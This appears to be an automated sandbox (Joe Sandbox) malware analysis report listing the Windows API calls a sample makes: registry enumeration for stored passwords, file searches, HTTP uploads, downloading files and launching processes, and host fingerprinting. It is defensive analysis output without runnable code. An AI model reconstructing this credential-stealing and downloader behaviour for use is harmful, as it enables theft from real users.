                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F19927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02F10DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02F19948
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02F10FC1
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F10FCD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID:
                                                  • API String ID: 1395395982-0
                                                  • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                  • Instruction ID: 088e6e894abd3afd9e1a0b57b5652edb08ad6de0aa6435f224bd2b7b0197ec31
                                                  • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                  • Instruction Fuzzy Hash: 0F61F5B5901218ABCB14EBA0CD95FEE773AAF44744F80419DE70A660C1EF746B88CF59
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                    • Part of subcall function 02F04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                    • Part of subcall function 02F04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02F04B7C
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 02F04BA1
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02F04D21
                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 02F0504F
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02F0506B
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02F0507F
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02F050B0
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F05114
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F0512C
                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02F04D7C
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F05136
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                  • String ID:
                                                  • API String ID: 2402878923-0
                                                  • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                  • Instruction ID: 7533bf6acbcf41fca5184f1c404d9476242eb68bafd30d8c4e4a4d83dcd162c3
                                                  • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                  • Instruction Fuzzy Hash: AD12DF72912218EBCB15EB90DD91FEEB77ABF15740F904199A20A72090EF746F88CF51
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                    • Part of subcall function 02F04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                    • Part of subcall function 02F04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02F06548
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 02F0656A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02F0659C
                                                  • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02F065EC
                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02F06626
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02F06638
                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02F06664
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02F066D4
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F06756
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F06760
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F0676A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                  • String ID:
                                                  • API String ID: 3074848878-0
                                                  • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                  • Instruction ID: efd03ad48bc78ba1ebd27e89ea217c158bd116a8dbd2e51bd56c09ecda7b3b79
                                                  • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                  • Instruction Fuzzy Hash: 62715C75A40218EBDB24DFE0DC88BEEB779FB44740F504199E60AAB1D0DBB56A84CF41
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02F192D3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateGlobalStream
                                                  • String ID:
                                                  • API String ID: 2244384528-0
                                                  • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                  • Instruction ID: db95be2f03c0527e868768abab5d05f92bca551e729b4789849533d903c571e7
                                                  • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                  • Instruction Fuzzy Hash: C1710CB9A40208ABDB14DFE4DD94FEEB7BAFF49700F508108F605A7290DB74A904CB61
                                                  APIs
                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                  • memset.MSVCRT ref: 0041716A
                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                  Strings
                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                  • sA, xrefs: 00417111
                                                  • sA, xrefs: 004172AE, 00417179, 0041717C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcesslstrcpymemset
                                                  • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                  • API String ID: 224852652-2614523144
                                                  • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                  • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                  • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                  • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02F177A9
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F177E6
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F1786A
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F17871
                                                  • wsprintfA.USER32 ref: 02F178A7
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                  • String ID: :$C$\$B
                                                  • API String ID: 1544550907-183544611
                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction ID: 59e02d79333ed1ce62a26999341846eb24e5473e664018ec1d46237f9d0e5f0b
                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction Fuzzy Hash: 7641A2B1D00258EBDB10EF94CC45FEEBBB9EF48750F100199E609A7280E7756A84CFA5
                                                  APIs
                                                    • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                    • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                    • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                    • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                    • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                    • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                  • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                  • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                  • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                  • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                  • task.LIBCPMTD ref: 004076FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                  • String ID: :
                                                  • API String ID: 3191641157-3653984579
                                                  • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                  • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                  • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                  • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                  APIs
                                                  • lstrcpy.KERNEL32(?,?), ref: 02F11642
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                    • Part of subcall function 02F194C7: StrStrA.SHLWAPI(?,?), ref: 02F194D3
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F1167E
                                                    • Part of subcall function 02F194C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 02F194F7
                                                    • Part of subcall function 02F194C7: lstrlen.KERNEL32(?), ref: 02F1950E
                                                    • Part of subcall function 02F194C7: wsprintfA.USER32 ref: 02F1952E
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F116C6
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F1170E
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F11755
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F1179D
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F117E5
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F1182C
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F11874
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                  • strtok_s.MSVCRT ref: 02F119B7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                  • String ID:
                                                  • API String ID: 4276352425-0
                                                  • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                  • Instruction ID: b1beb072e2fb7bd847f8cf5a3f9b3b33c267100fa68c7363943671b28fe71a3a
                                                  • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                  • Instruction Fuzzy Hash: F971A7B6941118ABCB14EBB0DD98EEE737AAF64340F4045D9E20EA3140EE759B84CF51
                                                  APIs
                                                  • memset.MSVCRT ref: 00407314
                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                  • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                    • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                  • task.LIBCPMTD ref: 00407555
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                  • String ID: Password
                                                  • API String ID: 2698061284-3434357891
                                                  • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                  • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                  • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                  • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                  APIs
                                                  • lstrcatA.KERNEL32(?,02D495F0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                  • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                  • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                  • lstrcatA.KERNEL32(?,02D15A20), ref: 00414847
                                                  • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                  • lstrcatA.KERNEL32(?,02D49C70), ref: 0041486F
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                    • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                    • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                    • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                    • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                  • String ID: 0aA
                                                  • API String ID: 167551676-2786531170
                                                  • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                  • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                  • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                  • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02D49218,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02D49218,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                  • __aulldiv.LIBCMT ref: 00418172
                                                  • __aulldiv.LIBCMT ref: 00418180
                                                  • wsprintfA.USER32 ref: 004181AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                  • String ID: %d MB$@
                                                  • API String ID: 2886426298-3474575989
                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                    • Part of subcall function 02F04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                    • Part of subcall function 02F04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 02F06376
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 02F063AE
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 02F063F6
                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02F0641A
                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 02F06443
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02F06471
                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 02F064B0
                                                  • InternetCloseHandle.WININET(?), ref: 02F064BA
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F064C7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 4287319946-0
                                                  • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                  • Instruction ID: 2fd85c3d063ace671bfa8782885bc49d445a9729071a5c52b3ba632cf2a5501a
                                                  • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                  • Instruction Fuzzy Hash: 28517FB5A40218AFDB20DFA0DD84BEE7779EB44745F408098F705A71C0DBB46A85CFA5
                                                  APIs
                                                  • memset.MSVCRT ref: 02F14FEE
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F15017
                                                  • lstrcat.KERNEL32(?,00421000), ref: 02F15034
                                                    • Part of subcall function 02F14B77: wsprintfA.USER32 ref: 02F14B93
                                                    • Part of subcall function 02F14B77: FindFirstFileA.KERNEL32(?,?), ref: 02F14BAA
                                                  • memset.MSVCRT ref: 02F1507A
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F150A3
                                                  • lstrcat.KERNEL32(?,00421020), ref: 02F150C0
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02F14BD8
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02F14BEE
                                                    • Part of subcall function 02F14B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02F14DE4
                                                    • Part of subcall function 02F14B77: FindClose.KERNEL32(000000FF), ref: 02F14DF9
                                                  • memset.MSVCRT ref: 02F15106
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1512F
                                                  • lstrcat.KERNEL32(?,00421038), ref: 02F1514C
                                                    • Part of subcall function 02F14B77: wsprintfA.USER32 ref: 02F14C17
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 02F14C2C
                                                    • Part of subcall function 02F14B77: wsprintfA.USER32 ref: 02F14C49
                                                    • Part of subcall function 02F14B77: PathMatchSpecA.SHLWAPI(?,?), ref: 02F14C85
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,0064A524), ref: 02F14CB1
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,00420FF8), ref: 02F14CC3
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,?), ref: 02F14CD7
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,00420FFC), ref: 02F14CE9
                                                    • Part of subcall function 02F14B77: lstrcat.KERNEL32(?,?), ref: 02F14CFD
